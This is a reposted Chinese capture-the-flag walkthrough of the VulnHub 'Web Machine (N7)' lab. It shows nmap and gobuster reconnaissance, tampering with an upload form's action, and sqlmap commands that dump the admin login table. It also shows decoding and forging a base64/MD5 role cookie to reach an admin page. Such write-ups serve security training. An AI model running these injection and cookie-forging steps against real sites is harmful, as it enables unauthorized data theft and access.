靶机练习No.3 VulnHub靶场 Web Machine(N7)

admin 2022年4月18日23:11:27安全文章评论103 views1514字阅读5分2秒阅读模式

靶机练习No.3 VulnHub靶场 Web Machine(N7)


攻击源IP:192.168.0.108

主机发现:sudo nmap -sP 192.168.0.1/24

--->  目标IP:192.168.0.103

端口扫描:

sudo nmap -sC -sV -p- 192.168.0.103 -oN Web_mechine.nmap

---> 只开放80端口

浏览器访问:192.168.0.103:80

---> 无有用信息

目录扫描:gobuster dir -u http://192.168.0.103 -w ../dict.txt -x .php,.html,.txt

---> index.html ->欢迎页 --> 可跳转peofile.php --> 无内容

---> exploit.html  ->  文件上传 -> 随意上传文件 -> 跳转localhost.profile.php -> 修改action: http://192.168.0.103:profile.php -> FLAG{N7

---> profile.php -> 直接打开无内容

---> server_status  -> Not Found Apache/2.4.46(Debian)

---> javascript -> Not Found Apache/2.4.46(Debian)

---> enter_network -> 登录页 -> post -> sqlmap爆破

sqlmap -r 1.txt --batch --dbs  --> Machine

sqlmap -r 1.txt -D Machine --batch --tables  --> login

sqlmap -r 1.txt -D Machine -T login --batch --dump-all  --> role:admin username:administrator password:FLAG{N7:KSA_01}

扫一下enter_network/目录:

gobuster dir -u http://192.168.0.100/enter_network/ -w ../dict.txt -x .php,.html,.txt

---> index.php  ->  登录界面

---> admin.php

cookie : user=JGFyZ29uMmkkdj0xOSRtPTY1NTM2LHQ9NCxwPTEkV21WdlMxSnRZbmhPWjNkRWFGZGFSUSRnR1BXMVlwWkdRQzVMOXE5VUpMcEQrTC9jYVpQbGtjbzZCYjVUZE1xR1BZ; role=MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%253D

MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%253D --url解码-->

MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D  --url解码-->

MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM=   --base64解码-->

21232f297a57a5a743894a0e4a801fc3  --md5解码-->  admin


Burp抓包:http://192.168.0.100/admin.php  -->  role=admin

--->    KSA_01}




靶机练习No.3 VulnHub靶场 Web Machine(N7)
pluck靶机介绍
VulnHub-FristiLeaks: 1.3-Walkthrough
VulnHub-PwnLab-Walkthrough
记一次Tomcat8-弱口令与后台上传getshell的漏洞复现

靶机练习No.3 VulnHub靶场 Web Machine(N7)


原文始发于微信公众号(北京路劲科技有限公司):靶机练习No.3 VulnHub靶场 Web Machine(N7)

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月18日23:11:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  靶机练习No.3 VulnHub靶场 Web Machine(N7) http://cn-sec.com/archives/924333.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: